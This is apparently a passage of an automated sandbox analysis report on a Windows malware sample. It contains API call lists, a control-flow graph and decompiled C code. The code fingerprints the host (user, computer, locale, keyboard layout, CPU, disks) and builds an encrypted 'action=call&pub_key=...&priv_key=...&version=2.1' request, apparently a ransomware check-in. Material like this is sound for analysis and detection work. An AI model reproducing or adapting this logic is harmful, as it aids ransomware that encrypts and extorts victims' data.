                                      0x00406e17
                                      0x00000000
                                      0x00000000
                                      0x00406e19
                                      0x00406e2f
                                      0x00406e36
                                      0x00406e51
                                      0x00406e51
                                      0x00406e53
                                      0x00000000
                                      0x00406e53
                                      0x00406e38
                                      0x00406e3f
                                      0x00000000
                                      0x00000000
                                      0x00406e51
                                      0x00000000
                                      0x00406e51

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                      • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                      • GetComputerNameW.KERNEL32 ref: 00406DF0
                                      • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
                                      • wsprintfW.USER32 ref: 00406E51
                                      • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                      • RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                      • GetLastError.KERNEL32 ref: 00406EC9
                                      • RegCloseKey.KERNEL32(00000000), ref: 00406ED2
                                      • VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
                                      • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
                                      • wsprintfW.USER32 ref: 00406F49
                                      • RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
                                      • RegQueryValueExW.KERNEL32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
                                      • GetLastError.KERNEL32 ref: 00406FA0
                                      • RegCloseKey.KERNEL32(00404590), ref: 00406FA9
                                      • lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
                                      • wsprintfW.USER32 ref: 00406FCF
                                      • wsprintfW.USER32 ref: 00407009
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407018
                                      • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
                                      • RegQueryValueExW.KERNEL32(?,productName,00000000,00000000,00404590,?), ref: 00407084
                                      • GetLastError.KERNEL32 ref: 00407097
                                      • RegCloseKey.KERNEL32(?), ref: 004070A0
                                      • wsprintfW.USER32 ref: 004070D1
                                      • GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
                                      • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
                                      • wsprintfW.USER32 ref: 0040712F
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0040716D
                                      • VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 00407180
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
                                      • GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
                                      • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
                                      • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
                                      • GetLastError.KERNEL32 ref: 0040722E
                                      • RegCloseKey.ADVAPI32(?), ref: 00407237
                                      • lstrlenW.KERNEL32(00000000), ref: 00407246
                                        • Part of subcall function 00406D10: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                        • Part of subcall function 00406D10: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                        • Part of subcall function 00406D10: RegCloseKey.KERNEL32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • wsprintfW.USER32 ref: 0040727A
                                      • lstrcatW.KERNEL32(?,00000000), ref: 0040728B
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040729E
                                      • lstrlenW.KERNEL32(?), ref: 004072AE
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
                                      • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                      • API String ID: 2088797152-983031137
                                      • Opcode ID: 74ffb924de28838f816d4790a0d5e143539f91be7cf099a53b34efc57e9b7aa9
                                      • Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
                                      • Opcode Fuzzy Hash: 74ffb924de28838f816d4790a0d5e143539f91be7cf099a53b34efc57e9b7aa9
                                      • Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 127 405750-4057dc call 4039b0 call 406d90 call 406ba0 VirtualAlloc 134 4057f1-4057f5 127->134 135 4057de-4057e0 127->135 137 4057f7-405806 134->137 135->134 136 4057e2-4057ef 135->136 136->137 138 405808-40580d 137->138 139 40581f-405821 137->139 138->139 141 40580f-40581d 138->141 140 405825-40582e 139->140 142 405830-40583b 140->142 143 40583d-40583f 140->143 141->140 142->143 144 405843-405845 142->144 143->144 145 405c14 144->145 146 40584b-4058c8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 144->146 149 405c1a 145->149 147 4058ca-4058cc 146->147 148 4058df 146->148 147->148 150 4058ce-4058dd 147->150 151 4058e7-4058f0 lstrlenA 148->151 152 405c1f-405c3d VirtualFree call 407720 149->152 150->151 153 4058f2-4058f8 151->153 154 4058fa 151->154 153->154 156 405902-40590c lstrlenA 153->156 154->156 158 405942-405949 lstrlenA 156->158 159 40590e-40591a 156->159 160 405971-405a38 lstrcatW lstrlenW call 4069a0 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 158->160 161 40594b-40594f 158->161 162 405920-405925 159->162 173 405a44-405a46 160->173 174 405a3a-405a3c 160->174 163 405953-405958 161->163 165 405932-40593c lstrlenA 162->165 166 405927-405929 162->166 168 405965-40596f lstrlenA 163->168 169 40595a-40595c 163->169 165->162 167 40593e 165->167 166->165 171 40592b-40592e 166->171 167->158 168->160 168->163 169->168 172 40595e-405961 169->172 171->165 172->168 176 405a4a-405afe lstrlenW call 408b30 lstrlenA call 405c40 call 405cf0 CryptBinaryToStringA 173->176 174->173 175 405a3e-405a42 174->175 175->176 183 405b00 GetLastError 176->183 184 405b06-405b2c lstrlenA VirtualAlloc lstrlenA 176->184 183->184 185 405b36 184->185 186 405b2e-405b34 184->186 187 405b3e-405b45 lstrlenA 185->187 186->185 186->187 188 405b47-405b4f 187->188 189 405b6e-405b9a lstrlenA MultiByteToWideChar call 405370 187->189 191 405b50-405b55 188->191 192 405b9f-405ba4 189->192 193 405b62-405b6c lstrlenA 191->193 194 405b57-405b59 191->194 195 405ba6-405bd5 VirtualFree * 3 192->195 196 405bd7-405bdd 192->196 193->189 193->191 194->193 197 405b5b-405b5e 194->197 195->152 198 405be4-405c12 VirtualFree * 3 196->198 199 405bdf-405be2 196->199 197->193 198->149 199->198
                                      C-Code - Quality: 79%
                                      			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                      				char _v295;
                                      				char _v296;
                                      				char _v404;
                                      				char _v408;
                                      				void* _v428;
                                      				CHAR* _v432;
                                      				int _v436;
                                      				int _v440;
                                      				char _v442;
                                      				CHAR* _v444;
                                      				short _v448;
                                      				int _v452;
                                      				char _v456;
                                      				CHAR* _v464;
                                      				int _v468;
                                      				void* _v472;
                                      				BYTE* _v476;
                                      				WCHAR* _v480;
                                      				WCHAR* _v484;
                                      				void* _v488;
                                      				void* _v492;
                                      				short* _v496;
                                      				CHAR* _v500;
                                      				void* _v504;
                                      				long _v508;
                                      				CHAR* _v512;
                                      				CHAR* _v528;
                                      				CHAR* _t133;
                                      				void* _t135;
                                      				int _t145;
                                      				void* _t148;
                                      				int _t149;
                                      				void* _t150;
                                      				void* _t152;
                                      				signed int _t159;
                                      				signed int _t163;
                                      				void* _t168;
                                      				void* _t170;
                                      				signed int _t172;
                                      				void* _t183;
                                      				CHAR* _t185;
                                      				long _t189;
                                      				intOrPtr _t199;
                                      				int _t200;
                                      				void _t202;
                                      				int _t203;
                                      				void _t204;
                                      				int _t205;
                                      				int _t210;
                                      				long _t213;
                                      				void* _t219;
                                      				short _t228;
                                      				char* _t229;
                                      				WCHAR* _t231;
                                      				short _t233;
                                      				CHAR* _t234;
                                      				char _t235;
                                      				void* _t238;
                                      				long _t240;
                                      				long _t241;
                                      				void* _t243;
                                      				void* _t245;
                                      				short _t248;
                                      				int _t249;
                                      				void* _t255;
                                      				CHAR* _t256;
                                      				WCHAR* _t258;
                                      				WCHAR* _t259;
                                      				signed int _t261;
                                      				CHAR* _t262;
                                      				CHAR* _t263;
                                      				int _t267;
                                      				void* _t268;
                                      				long _t271;
                                      				void* _t272;
                                      				void* _t273;
                                      				long _t279;
                                      				int _t280;
                                      				long _t281;
                                      				void* _t282;
                                      				CHAR* _t283;
                                      				short _t284;
                                      
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_v456 = __ecx;
                                      				_t210 = __edx;
                                      				_v436 = __edx;
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				E004039B0( &_v404);
                                      				E00406D90( &_v492); // executed
                                      				_t255 = E00406BA0( &_v492);
                                      				_t7 = _a8 + _t210 + 8; // 0x8
                                      				_t213 = _t255 + _t7 * 8 << 3;
                                      				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
                                      				_t248 = 0;
                                      				_v512 = _t133;
                                      				_v528 = _t133;
                                      				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
                                      				if(_t133 == 0 || _t228 >= _t213) {
                                      					_v448 = _t248;
                                      					_t256 = _t133;
                                      				} else {
                                      					_t256 =  &(_t133[_t228]);
                                      					_v448 = _t133;
                                      					_v444 = _t256;
                                      					_t248 = _t228;
                                      				}
                                      				_t135 = 2 + _a8 * 8;
                                      				if(_v428 == 0) {
                                      					L7:
                                      					_t229 = 0;
                                      					_v432 = 0;
                                      				} else {
                                      					_t284 = _t248 + _t135;
                                      					if(_t284 >= _t213) {
                                      						goto L7;
                                      					} else {
                                      						_t229 = _t256;
                                      						_v432 = _t256;
                                      						_t256 =  &(_t256[_t135]);
                                      						_t248 = _t284;
                                      						_v444 = _t256;
                                      					}
                                      				}
                                      				_t267 = _v440;
                                      				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                      					_t256 = 0;
                                      					_v444 = 0;
                                      				}
                                      				if(_t229 == 0) {
                                      					goto L53;
                                      				} else {
                                      					_t249 = _a8;
                                      					_v436 = _t249 + _t249;
                                      					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                      					_v452 = _t267 + _t267;
                                      					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                      					_t145 = lstrlenA(_t256);
                                      					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                      					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
                                      					_v472 = _t148;
                                      					_v488 = _t148;
                                      					_v492 = 0;
                                      					_t149 = lstrlenA(_v464);
                                      					_t231 = _v472;
                                      					_t150 = _t149 + 1;
                                      					if(_t231 == 0 || _t150 >= _t271) {
                                      						_v484 = 0;
                                      					} else {
                                      						_v492 = _t150;
                                      						_v488 = _t231 + _t150;
                                      						_v484 = _t231;
                                      					}
                                      					_t152 = lstrlenA(_t256) + 1;
                                      					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                      						_v488 = 0;
                                      					}
                                      					_t272 = 0;
                                      					if(lstrlenA(_v464) != 0) {
                                      						_t245 = _v484;
                                      						_t263 = _v464;
                                      						_v492 = _t245;
                                      						do {
                                      							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                      							if(_t204 != 0xa && _t204 != 0xd) {
                                      								 *_t245 = _t204;
                                      								_v492 = _t245 + 1;
                                      							}
                                      							_t272 = _t272 + 1;
                                      							_t205 = lstrlenA(_t263);
                                      							_t245 = _v492;
                                      						} while (_t272 < _t205);
                                      						_t256 = _v476;
                                      					}
                                      					_t273 = 0;
                                      					if(lstrlenA(_t256) != 0) {
                                      						_t243 = _v488;
                                      						_v492 = _t243;
                                      						do {
                                      							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                      							if(_t202 != 0xa && _t202 != 0xd) {
                                      								 *_t243 = _t202;
                                      								_v492 = _t243 + 1;
                                      							}
                                      							_t273 = _t273 + 1;
                                      							_t203 = lstrlenA(_t256);
                                      							_t243 = _v492;
                                      						} while (_t273 < _t203);
                                      					}
                                      					_t258 = _v480;
                                      					lstrcatW(_t258, L"action=call&");
                                      					_t259 =  &(_t258[lstrlenW(_t258)]);
                                      					E004069A0( &_v440, _t259); // executed
                                      					lstrcatW(_t259, L"&pub_key=");
                                      					_t159 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                      					lstrcatW(_t259, L"&priv_key=");
                                      					_t163 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                      					lstrcatW(_t259, L"&version=2.1");
                                      					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                      					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
                                      					_t219 = _t168;
                                      					_v480 = _t219;
                                      					_t170 = 2 + lstrlenW(_v484) * 8;
                                      					if(_t219 == 0 || _t170 >= _t279) {
                                      						_v492 = 0;
                                      					} else {
                                      						_v492 = _t219;
                                      					}
                                      					_t172 = lstrlenW(_v480);
                                      					_t233 = "#shasj"; // 0x61687323
                                      					_t261 = _t172;
                                      					asm("movq xmm0, [0x410128]");
                                      					_v448 = _t233;
                                      					_t234 =  *0x410134; // 0x6a73
                                      					_v444 = _t234;
                                      					_t235 =  *0x410136; // 0x0
                                      					asm("movq [esp+0x3c], xmm0");
                                      					_v442 = _t235;
                                      					_v296 = 0;
                                      					E00408B30( &_v295, 0, 0xff);
                                      					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
                                      					_t280 = _t261 + _t261;
                                      					E00405CF0( &_v296, _v480, _t280);
                                      					_t262 = _v492;
                                      					_v468 = _t261 * 8;
                                      					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                      						GetLastError();
                                      					}
                                      					_t105 = lstrlenA(_t262) + 2; // 0x2
                                      					_t281 = _t105;
                                      					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
                                      					_v504 = _t183;
                                      					_t107 = lstrlenA(_t262) + 1; // 0x1
                                      					_t238 = _t107;
                                      					_t185 = _v504;
                                      					if(_t185 == 0) {
                                      						L40:
                                      						_v500 = 0;
                                      					} else {
                                      						_v500 = _t185;
                                      						if(_t238 >= _t281) {
                                      							goto L40;
                                      						}
                                      					}
                                      					_t282 = 0;
                                      					if(lstrlenA(_t262) != 0) {
                                      						_t241 = _v500;
                                      						_v508 = _t241;
                                      						do {
                                      							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                      							if(_t199 != 0xa && _t199 != 0xd) {
                                      								 *_t241 = _t199;
                                      								_v508 = _t241 + 1;
                                      							}
                                      							_t282 = _t282 + 1;
                                      							_t200 = lstrlenA(_t262);
                                      							_t241 = _v508;
                                      						} while (_t282 < _t200);
                                      					}
                                      					_t283 = _v500;
                                      					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                      					_v508 = 0;
                                      					_t189 = E00405370(_t283,  &_v508, 1); // executed
                                      					if(_t189 != 0) {
                                      						_t240 = _v508;
                                      						if(_t240 != 0) {
                                      							 *_a12 = _t240;
                                      						}
                                      						VirtualFree(_v504, 0, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						L53:
                                      						_t268 = 1;
                                      					} else {
                                      						VirtualFree(_v504, _t189, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						_t268 = 0;
                                      					}
                                      				}
                                      				VirtualFree(_v428, 0, 0x8000);
                                      				E00407720( &_v408);
                                      				return _t268;
                                      			}





















































































                                      0x0040575f
                                      0x00405760
                                      0x00405762
                                      0x00405763
                                      0x00405768
                                      0x0040576c
                                      0x0040576e
                                      0x00405772
                                      0x00405774
                                      0x00405775
                                      0x00405777
                                      0x00405778
                                      0x0040577a
                                      0x0040577b
                                      0x0040577d
                                      0x0040577e
                                      0x00405783
                                      0x00405785
                                      0x00405786
                                      0x0040578f
                                      0x00405798
                                      0x004057a9
                                      0x004057b4
                                      0x004057ba
                                      0x004057c0
                                      0x004057c6
                                      0x004057c8
                                      0x004057cc
                                      0x004057d3
                                      0x004057dc
                                      0x004057f1
                                      0x004057f5
                                      0x004057e2
                                      0x004057e2
                                      0x004057e5
                                      0x004057e9
                                      0x004057ed
                                      0x004057ed
                                      0x004057ff
                                      0x00405806
                                      0x0040581f
                                      0x0040581f
                                      0x00405821
                                      0x00405808
                                      0x00405808
                                      0x0040580d
                                      0x00000000
                                      0x0040580f
                                      0x0040580f
                                      0x00405811
                                      0x00405815
                                      0x00405817
                                      0x00405819
                                      0x00405819
                                      0x0040580d
                                      0x0040582a
                                      0x0040582e
                                      0x0040583d
                                      0x0040583f
                                      0x0040583f
                                      0x00405845
                                      0x00000000
                                      0x0040584b
                                      0x0040584b
                                      0x00405857
                                      0x0040586a
                                      0x0040586f
                                      0x00405883
                                      0x0040588c
                                      0x004058a0
                                      0x004058a5
                                      0x004058af
                                      0x004058b3
                                      0x004058b7
                                      0x004058bf
                                      0x004058c1
                                      0x004058c5
                                      0x004058c8
                                      0x004058df
                                      0x004058ce
                                      0x004058d1
                                      0x004058d5
                                      0x004058d9
                                      0x004058d9
                                      0x004058ea
                                      0x004058f0
                                      0x004058fa
                                      0x004058fa
                                      0x00405906
                                      0x0040590c
                                      0x0040590e
                                      0x00405912
                                      0x00405916
                                      0x00405920
                                      0x00405920
                                      0x00405925
                                      0x0040592b
                                      0x0040592e
                                      0x0040592e
                                      0x00405933
                                      0x00405934
                                      0x00405936
                                      0x0040593a
                                      0x0040593e
                                      0x0040593e
                                      0x00405943
                                      0x00405949
                                      0x0040594b
                                      0x0040594f
                                      0x00405953
                                      0x00405953
                                      0x00405958
                                      0x0040595e
                                      0x00405961
                                      0x00405961
                                      0x00405966
                                      0x00405967
                                      0x00405969
                                      0x0040596d
                                      0x00405953
                                      0x00405971
                                      0x00405981
                                      0x00405990
                                      0x00405994
                                      0x0040599f
                                      0x004059a2
                                      0x004059c0
                                      0x004059cc
                                      0x004059cf
                                      0x004059f1
                                      0x004059fd
                                      0x00405a17
                                      0x00405a1d
                                      0x00405a27
                                      0x00405a29
                                      0x00405a2f
                                      0x00405a38
                                      0x00405a46
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a4e
                                      0x00405a50
                                      0x00405a56
                                      0x00405a58
                                      0x00405a67
                                      0x00405a6b
                                      0x00405a77
                                      0x00405a7c
                                      0x00405a85
                                      0x00405a8b
                                      0x00405a8f
                                      0x00405a97
                                      0x00405ab8
                                      0x00405ac1
                                      0x00405acf
                                      0x00405ade
                                      0x00405ae2
                                      0x00405afe
                                      0x00405b00
                                      0x00405b00
                                      0x00405b10
                                      0x00405b10
                                      0x00405b16
                                      0x00405b1d
                                      0x00405b23
                                      0x00405b23
                                      0x00405b26
                                      0x00405b2c
                                      0x00405b36
                                      0x00405b36
                                      0x00405b2e
                                      0x00405b2e
                                      0x00405b34
                                      0x00000000
                                      0x00000000
                                      0x00405b34
                                      0x00405b3f
                                      0x00405b45
                                      0x00405b47
                                      0x00405b4b
                                      0x00405b50
                                      0x00405b50
                                      0x00405b55
                                      0x00405b5b
                                      0x00405b5e
                                      0x00405b5e
                                      0x00405b63
                                      0x00405b64
                                      0x00405b66
                                      0x00405b6a
                                      0x00405b50
                                      0x00405b6e
                                      0x00405b84
                                      0x00405b90
                                      0x00405b9a
                                      0x00405ba4
                                      0x00405bd7
                                      0x00405bdd
                                      0x00405be2
                                      0x00405be2
                                      0x00405bf6
                                      0x00405c03
                                      0x00405c10
                                      0x00405c1a
                                      0x00405c1a
                                      0x00405ba6
                                      0x00405bb7
                                      0x00405bc4
                                      0x00405bd1
                                      0x00405bd3
                                      0x00405bd3
                                      0x00405ba4
                                      0x00405c2a
                                      0x00405c30
                                      0x00405c3d

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
                                      • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
                                      • lstrlenA.KERNEL32(00000000), ref: 0040588C
                                      • lstrlenA.KERNEL32(?), ref: 00405894
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
                                      • lstrlenA.KERNEL32(?), ref: 004058BF
                                      • lstrlenA.KERNEL32(00000000), ref: 004058E8
                                      • lstrlenA.KERNEL32(?), ref: 00405908
                                      • lstrlenA.KERNEL32(?), ref: 00405934
                                      • lstrlenA.KERNEL32(00000000), ref: 00405945
                                      • lstrlenA.KERNEL32(00000000), ref: 00405967
                                      • lstrcatW.KERNEL32(?,action=call&), ref: 00405981
                                      • lstrlenW.KERNEL32(?), ref: 0040598A
                                      • lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
                                      • lstrlenW.KERNEL32(?), ref: 004059A2
                                      • lstrlenA.KERNEL32(00000000), ref: 004059AB
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
                                      • lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
                                      • lstrlenW.KERNEL32(?), ref: 004059CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004059DC
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
                                      • lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
                                      • lstrlenW.KERNEL32(?), ref: 00405A09
                                      • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
                                      • lstrlenW.KERNEL32(?), ref: 00405A2D
                                      • lstrlenW.KERNEL32(?), ref: 00405A4E
                                      • _memset.LIBCMT ref: 00405A97
                                      • lstrlenA.KERNEL32(?), ref: 00405AAA
                                        • Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D
                                      • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
                                      • GetLastError.KERNEL32 ref: 00405B00
                                      • lstrlenA.KERNEL32(?), ref: 00405B07
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
                                      • lstrlenA.KERNEL32(?), ref: 00405B21
                                      • lstrlenA.KERNEL32(?), ref: 00405B41
                                      • lstrlenA.KERNEL32(?), ref: 00405B64
                                      • lstrlenA.KERNEL32(00000000), ref: 00405B73
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
